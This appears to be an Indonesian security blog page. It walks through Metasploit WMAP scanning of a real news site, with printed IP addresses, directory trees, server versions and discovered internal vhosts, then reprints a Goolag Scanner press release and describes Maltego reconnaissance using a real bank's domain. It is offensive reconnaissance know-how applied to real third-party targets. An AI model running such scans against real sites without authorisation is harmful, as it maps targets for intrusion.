202.158.66.94|GET|User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
Referer: http://detik.com/
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: __utma=146380193.1809118446.1213005860.1213005860.1213005860.1
Connection: keep-alive
Proxy-Connection: keep-alive
Host: detik.com

(6). Berikutnya kita akan melihat bagaimana wmap bekerja. Pada langkah pertama tadi kita telah membuat database wmap_test.db melalui msfconsole sekaligus connect ke database tersebut secara otomatis menggunakan plugin db_sqlite3. Maka selanjutnya yang dibutuhkan adalah load plugin wmap untuk kemudian membaca database wmap_test.db tersebut.

msf > load db_wmap
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > wmap_targets -p
[*]    Id. Host                    Port    SSL
[*] Done.
msf > wmap_targets -r          <<< Ini salah satu langkah penting, sebelum print target, harus reload terlebih dahulu.
[*] Added. 202.158.66.94 80 0
[*] Added. 202.158.66.164 80 0
[*] Added. 202.158.66.86 80 0
[*] Added. 202.158.66.20 80 0
[*] Added. 202.158.66.190 80 0
[*] Added. 202.158.66.54 80 0
[*] Added. 202.158.66.24 80 0
[*] Added. 64.233.183.127 80 0
msf > wmap_targets -p  << target berikut ini hasil browsing via web browser ke situs detik.com
[*]    Id. Host                    Port    SSL
[*]    1. 202.158.66.94                          80
[*]    2. 202.158.66.164                         80
[*]    3. 202.158.66.86                          80
[*]    4. 202.158.66.20                          80
[*]    5. 202.158.66.190                         80
[*]    6. 202.158.66.54                          80
[*]    7. 202.158.66.24                          80
[*]    8. 64.233.183.127                         80
[*] Done.

msf > wmap_targets -s 1

msf > wmap_targets -p
[*]    Id. Host                    Port    SSL
[*] => 1. 202.158.66.94                          80
[*]    2. 202.158.66.164                         80
[*]    3. 202.158.66.86                          80
[*]    4. 202.158.66.20                          80
[*]    5. 202.158.66.190                         80
[*]    6. 202.158.66.54                          80
[*]    7. 202.158.66.24                          80
[*]    8. 64.233.183.127                         80
[*] Done.
msf > wmap_website
[*] Website structure
[*] 202.158.66.94:80 SSL:0
ROOT_TREE
+------favicon.ico
|    js
|    +------swfobject.js
|    +------openwin11.js
|    +------etc.js
|    +------expandbannerall.js.html
|    +------contentslider.js
|    +------tabcontent.js
|    +------jquery-1.2.6.min.js
[*] Done.
msf > wmap_targets -s 2
msf > wmap_website
[*] Website structure
[*] 202.158.66.164:80 SSL:0
ROOT_TREE
|    images
|    +------telkomsel-280x175.gif
|    +------banner-detik-rev-final.gif
|    +------1x1.gif
|    +------promocontinue_4.swf
|    delivery
|    +------spcjs.php
|    +------lg.php
|    +------spc.php
|    +------fl.js
[*] Done.
msf > wmap_targets -s 3
msf > wmap_website
[*] Website structure
[*] 202.158.66.86:80 SSL:0
ROOT_TREE
|    css
|    +------allslider.css
|    +------detikcom.css
|    +------pollingsmsorange02.css
|    +------alltabs.css
|    images
|    |    content
|    |    |    blog
|    |    |    |    -
|    |    |    |    +------20081219172849_blog.jpg
|    |    |    |    +------20081219115448_blog.jpg
|    |    |    |    +------20081219134455_blog.jpg
|    |    |    2008
|    |    |    |    12
|    |    |    |    |    22
|    |    |    |    |    |    71
|    |    |    |    |    |    +------SpallettiAFP-cov.jpg
|    |    |    |    |    |    +------ranieri-cov.jpg
|    |    |    |    |    |    72
|    |    |    |    |    |    +------ArsenalPool-EddieKeogh200.jpg
|    |    |    |    |    |    73
|    |    |    |    |    |    +------vandersar-cover.jpg
|    |    |    |    |    |    75
|    |    |    |    |    |    +------Sevilla-Reuters200.jpg
|    |    |    |    |    |    +------BarcaDiegoTusonAFP-cov.jpg
|    |    |    |    |    |    10
|    |    |    |    |    |    +------wir-cover.jpg
|    |    |    |    |    21
|    |    |    |    |    |    648
|    |    |    |    |    |    +------toyota-depan.JPG
|    |    |    |    |    |    288
|    |    |    |    |    |    +------RumahDurian.jpg
|    |    |    |    |    |    157
|    |    |    |    |    |    +------coverpknu.jpg
|    |    |    |    |    |    +------coverateror.jpg
|    |    |    |    |    |    +------coverpolis.jpg
|    |    video
|    |    |    2008
|    |    |    |    12
|    |    |    |    +------081221483.png
|    image
|    +------iring808.gif
|    +------icn_jwb.gif
|    +------arrow_up.gif
|    +------ticketboxlogo.gif
|    +------logodetikcomfooter.gif
|    +------pollwpdetik.gif
|    +------spacer.gif
|    +------iconvideo.gif
|    +------logodetikcom.gif
|    +------Logo_25wht.gif
|    +------song_icon.gif
|    +------arrow_down.gif
|    +------tvwp.swf
|    +------iconphoto.gif
|    +------rssfeed_s.gif
|    +------panahforumwp.gif
|    +------bgregional6a.gif
|    +------bgticketbox.gif
|    +------bgdetikmap.gif
|    +------bgtapoff6a.gif
|    +------radioplayer.gif
|    +------bgpollsmsorange.gif
|    +------bgtapon6a.gif
|    +------pollingsmscenter.jpg
|    +------rss.gif
|    +------tanyasajalogo.gif
|    +------bgmenuatas.gif
|    +------tanya.gif
|    +------detikpublishinglogo.gif
|    +------bgmaplokasi.gif
|    +------bgcontent.gif
[*] Done.
msf > wmap_targets -s 4
msf > wmap_website
[*] Website structure
[*] 202.158.66.20:80 SSL:0
ROOT_TREE
|    content_image
|    |    2008
|    |    |    12
|    |    |    |    20
|    |    |    |    |    283
|    |    |    |    |    +------20081220-andini-k.jpg
|    |    |    |    |    471
|    |    |    |    |    +------wanita-k.jpg
[*] Done.
msf > wmap_targets -s 5
msf > wmap_website
[*] Website structure
[*] 202.158.66.190:80 SSL:0
ROOT_TREE
|    images
|    |    content
|    |    |    2008
|    |    |    |    12
|    |    |    |    |    18
|    |    |    |    |    |    238
|    |    |    |    |    |    +------bantuan-luar.jpg
[*] Done.
msf > wmap_targets -s 6
msf > wmap_website
[*] Website structure
[*] 202.158.66.54:80 SSL:0
ROOT_TREE
|    images
|    |    wp
|    |    +------Telkomsel-200x300.swf
|    |    +------alexa_200x300b.gif
|    |    +------BannerFLEXISPEEDY_300x250-01.swf
|    |    +------wp-detik-magicaccess2.swf
|    |    +------wp1-XLSolution-338x200.swf
|    |    +------StarTV-19-338x133.swf
|    |    +------StarTV-19-338x30.swf
|    |    +------BannerBudpar875x100-01.swf
|    |    +------Banner_Detik_Agustus_08.jpg
[*] Done.
msf > wmap_targets -s 7
msf > wmap_website
[*] Website structure
[*] 202.158.66.24:80 SSL:0
ROOT_TREE
|    static
|    |    detikcom1
|    |    +------toppariwaradetikcom.php
[*] Done.

msf > wmap_run -t
[*] Loaded auxiliary/scanner/http/version ...
[*] Loaded auxiliary/scanner/http/wmap_ssl_vhost ...
[*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...
[*] Loaded auxiliary/scanner/http/frontpage_login ...
[*] Loaded auxiliary/scanner/http/frontpage ...
[*] Loaded auxiliary/scanner/http/wmap_file_same_name_dir ...
[*] Loaded auxiliary/scanner/http/wmap_dir_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_prev_dir_same_name_file ...
[*] Loaded auxiliary/scanner/http/wmap_backup_file ...
[*] Loaded auxiliary/scanner/http/wmap_dir_listing ...
[*] Loaded auxiliary/scanner/http/wmap_replace_ext ...
[*] Loaded auxiliary/scanner/http/writable ...
[*] Loaded auxiliary/scanner/http/wmap_files_dir ...
[*] Loaded auxiliary/scanner/http/wmap_brute_dirs ...
[*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...
[*] Analysis completed in 1.00374484062195 seconds.
[*] Done.

msf > wmap_targets -s 3
msf > wmap_targets -p
[*]    Id. Host                    Port    SSL
[*]    1. 202.158.66.94                          80
[*]    2. 202.158.66.164                         80
[*] => 3. 202.158.66.86                          80
[*]    4. 202.158.66.20                          80
[*]    5. 202.158.66.190                         80
[*]    6. 202.158.66.54                          80
[*]    7. 202.158.66.24                          80
[*]    8. 64.233.183.127                         80
[*] Done.

msf > setg VHOST www.detik.com
VHOST => www.detik.com
msf > setg DOMAIN detik.com
DOMAIN => detik.com
msf > setg EXT .php
EXT => .php

msf > wmap_run -e
[*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against 202.158.66.86:80

[*] Sending request with random domain LtELt.detik.com
[*] Vhost found  admin.detik.com
[*] Vhost found  services.detik.com
[*] Vhost found  webmail.detik.com
[*] Vhost found  console.detik.com
[*] Vhost found  apps.detik.com
[*] Vhost found  mail.detik.com
[*] Vhost found  intranet.detik.com
[*] Vhost found  intra.detik.com
[*] Vhost found  corporate.detik.com
[*] Vhost found  www.detik.com
[*] Vhost found  web.detik.com
[*] Launching auxiliary/scanner/http/frontpage_login WMAP_SERVER against 202.158.66.86:80
[*] http://202.158.66.86:80/ may not support FrontPage Server Extensions
[*] Launching auxiliary/scanner/http/version WMAP_SERVER against 202.158.66.86:80
[*] 202.158.66.86 is running Apache/2.2.9 (Unix) DAV/2 PHP/5.1.6 ( Powered by PHP/5.1.6 )
[*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against 202.158.66.86:80
[*] http://202.158.66.86:80 is running Apache/2.2.4 (Unix) DAV/2 PHP/5.1.6
[*] FrontPage not found on http://202.158.66.86:80 [404 Not Found]
[*] Launching auxiliary/scanner/http/wmap_ssl_vhost WMAP_SERVER against 202.158.66.86:80
[*] Error: 202.158.66.86 unknown protocol
[*] Launching auxiliary/scanner/http/wmap_brute_dirs WMAP_DIR / against 202.158.66.86:80...
[*] Running..
[*] NOT Found http://202.158.66.86:/Aaa/  404
[*] NOT Found http://202.158.66.86:/Aab/  404
[*] NOT Found http://202.158.66.86:/Aac/  404
...

...

...

msf > wmap_reports -p
[*] Id. Created                Target (host,port,ssl)
19.  Mon Dec 22 00:29:25 +0300 2008    202.158.66.86,,0
18.  Mon Dec 22 00:29:19 +0300 2008    202.158.66.86,80,0
4.  Mon Dec 22 00:22:31 +0300 2008    202.158.66.86,80,0
1.  Mon Dec 22 00:00:21 +0300 2008    64.233.183.127,80,0
[*] Done.
msf > wmap_reports -s 19
WMAP REPORT: 202.158.66.86,,0 Metasploit WMAP Report [Mon Dec 22 00:29:25 +0300 2008]
VHOST NAME: admin.detik.com Vhost admin.detik.com found. [Mon Dec 22 00:29:25 +0300 2008]
VHOST NAME: services.detik.com Vhost services.detik.com found. [Mon Dec 22 00:29:27 +0300 2008]
VHOST NAME: webmail.detik.com Vhost webmail.detik.com found. [Mon Dec 22 00:29:31 +0300 2008]
VHOST NAME: console.detik.com Vhost console.detik.com found. [Mon Dec 22 00:29:32 +0300 2008]
VHOST NAME: apps.detik.com Vhost apps.detik.com found. [Mon Dec 22 00:29:34 +0300 2008]
VHOST NAME: mail.detik.com Vhost mail.detik.com found. [Mon Dec 22 00:29:38 +0300 2008]
VHOST NAME: intranet.detik.com Vhost intranet.detik.com found. [Mon Dec 22 00:29:39 +0300 2008]
VHOST NAME: intra.detik.com Vhost intra.detik.com found. [Mon Dec 22 00:29:41 +0300 2008]
VHOST NAME: corporate.detik.com Vhost corporate.detik.com found. [Mon Dec 22 00:29:42 +0300 2008]
VHOST NAME: www.detik.com Vhost www.detik.com found. [Mon Dec 22 00:29:45 +0300 2008]
VHOST NAME: web.detik.com Vhost web.detik.com found. [Mon Dec 22 00:29:46 +0300 2008]
[*] Done.
msf > wmap_reports -s 18
WMAP REPORT: 202.158.66.86,80,0 Metasploit WMAP Report [Mon Dec 22 00:29:19 +0300 2008]
WEB_SERVER TYPE: Apache/2.2.9 (Unix) DAV/2 PHP/5.1.6 ( Powered by PHP/5.1.6 )  [Mon Dec 22 00:29:57 +0300 2008]
[*] Done.

Itulah beberapa contoh penggunaan WMAP metasploit. Dan seperti biasa, metasploit bukanlah tools ajaib yang dengan konfigurasi standard (baca: donlot langsung pakai) dapat memuaskan para kiddies. Metasploit Framework adalah suatu framework yang memberikan lingkungan luar biasa bagi mereka-mereka yang dapat memanfaatkannya dengan sangat baik. Jangan heran jika banyak yang memiliki plugin-plugin ataupun exploit-exploit pribadi dengan metasploit framework mereka sendiri tanpa mem-publishnya kepada umum. WMAP saat ini merupakan project awal metasploit untuk penetrasi aplikasi web, dengan sifatnya yang opensource maka dalam beberapa waktu dapat kita ramalkan banyak modul-modul yang akan ditambahkan.

Untuk kalian yang hobi bermain-main dengan aplikasi web dan mencari tools yang dapat membantu proses tersebut secara otomatis serta dapat dikustomisasi maka WMAP metasploit adalah salah satu pilihan yang baik.

PS: ada yang memperhatikan bahwa detik.com memiliki struktur yang cukup unik dan menarik?

—–FOR IMMEDIATE RELEASESECURITY ADVISORY: The following program may screw a large Internet searchengine and make the Web a safer place.

LUBBOCK, TX, February 20th — Today CULT OF THE DEAD COW (cDc), the world’s

most attractive hacker group, announced the release of Goolag Scanner, a web

auditing tool. Goolag Scanner enables everyone to audit his or her own web

site via Google. The scanner technology is based on “Google hacking,” a form

of vulnerability research developed by Johnny I Hack Stuff. He’s a lovely

fellow. Go buy him a drink.

“It’s no big secret that the Web is the platform,” said cDc spokesmodel

Oxblood Ruffin. “And this platform pretty much sucks from a security

perspective. Goolag Scanner provides one more tool for web site owners to

patch up their online properties. We’ve seen some pretty scary holes through

random tests with the scanner in North America, Europe, and the Middle East.

If I were a government, a large corporation, or anyone with a large web site,

I’d be downloading this beast and aiming it at my site yesterday. The v

ulnerabilities are that serious.”

Goolag Scanner will be released open source under the GNU Affero General

Public license. It is dedicated to the memory of Wau Holland, founder of the

Chaos Computer Club, and a true champion of privacy rights and social justice.

GOOLAG SCANNER FUNCTIONS AND FEATURES

Goolag Scanner is a standalone windows GUI based application. It uses one

xml-based configuration file for its settings. All dorks coming with the

distribution of gS are kept inside one file.

–

Press Contact

Oxblood Ruffin

oxblood at hacktivismo.com

Saya merasakan tools ini sangat membantu, terutama karena saya sangat malas menghafal jenis-jenis dork . Get it from here.

Maltego merupakan toos inovatif yang ditujukan untuk proses information gathering. Proses information gathering yang awalnya menggunakan cara klasik seperti domain-whois, search-engine, archive, dsb sekarang dapat dilakukan secara otomatis. Maltego memiliki metode spesifikasi tersendiri untuk proses information gathering yang didalamnya sudah melibatkan metode-metode klasik yang umum digunakan sebelumnya.

Maltego menggunakan metode ‘keterkaitan’ antara beberapa objek. Objek tersebut terdiri dari Domain, IP Address, DNS Name, Website, e-mail, Location, Person, dsb. Yang dilakukan maltego adalah menggambarkan hubungan keterkaitan antar objek yang akan dicari. Proses penggambaran hubungan tersebut dilakukan oleh suatu metode (plugin) yang disebut transform. Transform akan mencari objek lain yang memiliki hubungan dengan objek yang dicari serta menggambarkan hubungan tersebut dalam suatu bentuk grafik. Misalnya: akan dicari segala hal yang berhubungan dengan suatu domain kilkbca.com, maka klikbca.com merupakan objek awal pencarian. Transform akan mencari objek lain yang berhubungan dengan objek klikbca.com, misalnya: mencari objek IP Address klikbca.com, IP Netblock yang dimiliki oleh klikbca.com, website yang dimiliki oleh klikbca.com, mx records yang berhubungan dengan klikbca.com, mencari person yang berhubungan dengan klikbca.com. Dari semua hasil transform objek tersebut, kita juga dapat mencari objek lainnya. Misal: dari person hasil transform domain klikbca.com dapat dicari social network apa saja yang diikuti oleh person tersebut, alamat email person tersebut, person tersebut terkait dengan website apa saja, dsb.

Dengan melihat kemampuan maltego, maka proses information gathering akan semakin mudah dilakukan bahkan oleh orang awam sekalipun. Dan kita dapat mencari titik lemah mana yang dapat digunakan untuk menusuk masuk ke dalam suatu target.

Transform (plugin mengubah dari DNS -> IP Address, DNS -> MX Record, E-Mail -> Social Network (Friendster)) juga dapat dikembangkan sendiri oleh user. Maltego memberikan draft spesifikasi yang dapat digunakan untuk mengembangkan jenis transform tertentu sesuai keinginan kita, dan bahkan kita juga bisa membatasi siapa saja yang dapat menggunakan transform milik kita tersebut dengan suatu API key.

Maltego bisa kalian dapatkan dari situs resminya, dan dari situs remi tersebut juga bisa didapatkan spesifikasi design maltego, API, serta dokumentasi cara penggunaan dan diskusi mengenai maltego. Berikut ini salah satu snapshot dari maltego untuk objek domain kecoak-elektronik.net:

List services Maltego

Output Maltego untuk domain kecoak-elektronik.net